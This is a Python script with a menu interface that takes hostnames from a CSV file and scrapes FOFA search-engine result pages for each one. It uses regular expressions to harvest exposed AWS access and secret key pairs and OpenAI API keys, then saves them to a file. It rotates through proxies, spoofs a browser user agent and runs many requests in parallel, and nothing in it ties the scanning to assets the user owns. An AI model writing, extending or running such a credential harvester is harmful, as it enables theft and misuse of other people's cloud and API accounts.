import csv
import re
import requests
from datetime import datetime
from itertools import cycle
from concurrent.futures import ThreadPoolExecutor, as_completed

# Define the regex patterns for AWS and OpenAI
patterns = {
    'AWS': {
        'access_key_pattern': r'(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])',
        'secret_key_pattern': r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])'
    },
    'OPENAI': {
        'regex_pattern': r'sk-[A-Za-z0-9]{48}'
    }
}

# Define the base URL to which the hostnames will be appended
base_url = 'https://en.fofa.info/result/website?host='

# Function to extract hostnames from the CSV file
def extract_hostnames(csv_file_path):
    hostnames = []
    with open(csv_file_path, 'r', newline='') as csvfile:
        reader = csv.reader(csvfile)
        for row in reader:
            if row:  # Ensure the row is not empty
                hostnames.append(row[0])  # Assumes hostnames are in the first column
    return hostnames

# Function to search for keys in the webpage content
def search_for_keys(url, regex_patterns, output_file, proxy=None):
    print(f"Now searching {url}")
    try:
        # Define headers to mimic a web browser
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        }
        proxies = {"http": proxy, "https": proxy} if proxy else None
        # Make the HTTP request with the defined headers
        response = requests.get(url, headers=headers, proxies=proxies, timeout=10)
        if response.status_code == 200:
            text = response.text
            # Check if we're searching for AWS keys
            if 'access_key_pattern' in regex_patterns and 'secret_key_pattern' in regex_patterns:
                access_keys = re.findall(regex_patterns['access_key_pattern'], text)
                secret_keys = re.findall(regex_patterns['secret_key_pattern'], text)
                print(f"Found AWS Access Keys: {len(access_keys)}")
                print(f"Found AWS Secret Keys: {len(secret_keys)}")
                for access_key, secret_key in zip(access_keys, secret_keys):
                    output_file.write(f"{access_key}:{secret_key}\n")
            # Check if we're searching for OpenAI keys
            elif 'regex_pattern' in regex_patterns:
                openai_keys = re.findall(regex_patterns['regex_pattern'], text)
                print(f"Found OpenAI Keys: {len(openai_keys)}")
                for openai_key in openai_keys:
                    output_file.write(f"{openai_key}\n")
            output_file.flush()  # Ensure the matches are written to the file immediately
        else:
            print(f"Failed to retrieve data from {url} with status code {response.status_code}")
    except Exception as e:
        print(f"An error occurred while trying to get {url}: {e}")


# Main function to process the hostnames and write the results to the output file
def main(csv_file_path, regex_patterns, output_file_path, use_proxies, proxies_file=None):
    hostnames = extract_hostnames(csv_file_path)
    proxies_list = []

    if use_proxies and proxies_file:
        # Load proxies from the specified file
        with open(proxies_file, 'r') as file:
            proxies_list = [line.strip() for line in file if line.strip()]
    proxy_cycle = cycle(proxies_list) if proxies_list else None

    # Open the output file once and pass the file object to the threads
    with open(output_file_path, 'w') as output_file:
        # Use ThreadPoolExecutor to create a pool of threads
        with ThreadPoolExecutor(max_workers=10) as executor:  # Adjust max_workers as needed
            # Submit tasks to the executor
            future_to_url = {
                executor.submit(
                    search_for_keys,
                    base_url + hostname,
                    regex_patterns,
                    output_file,
                    next(proxy_cycle) if proxy_cycle else None
                ): hostname for hostname in hostnames
            }

            # Process results as they are completed
            for future in as_completed(future_to_url):
                url = future_to_url[future]
                try:
                    future.result()  # We already logged the result in the search function
                except Exception as e:
                    print(f"An error occurred while processing {url}: {e}")

# Simple TUI to get user input
def simple_tui():
    print("Select the type of keys to search for:")
    print("1. AWS")
    print("2. OPENAI")
    choice = input("Enter your choice (1 or 2): ")

    if choice == '1':
        selected_patterns = patterns['AWS']
    elif choice == '2':
        selected_patterns = {'regex_pattern': patterns['OPENAI']['regex_pattern']}
    else:
        print("Invalid choice. Exiting.")
        return

    use_proxies = input("Do you want to use proxies? (yes/no): ").lower() == 'yes'
    proxies_file = None
    if use_proxies:
        proxies_file = input("Enter the name of the proxies file (i.e., proxies.txt): ")

    csv_file_name = input("Enter the name of the CSV file to search (with or without '.csv'): ")
    if not csv_file_name.lower().endswith('.csv'):
        csv_file_name += '.csv'
    csv_file_path = csv_file_name

    timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
    output_file_path = f'found_keys_{timestamp}.txt'

    main(csv_file_path, selected_patterns, output_file_path, use_proxies, proxies_file)

if __name__ == '__main__':
    simple_tui()
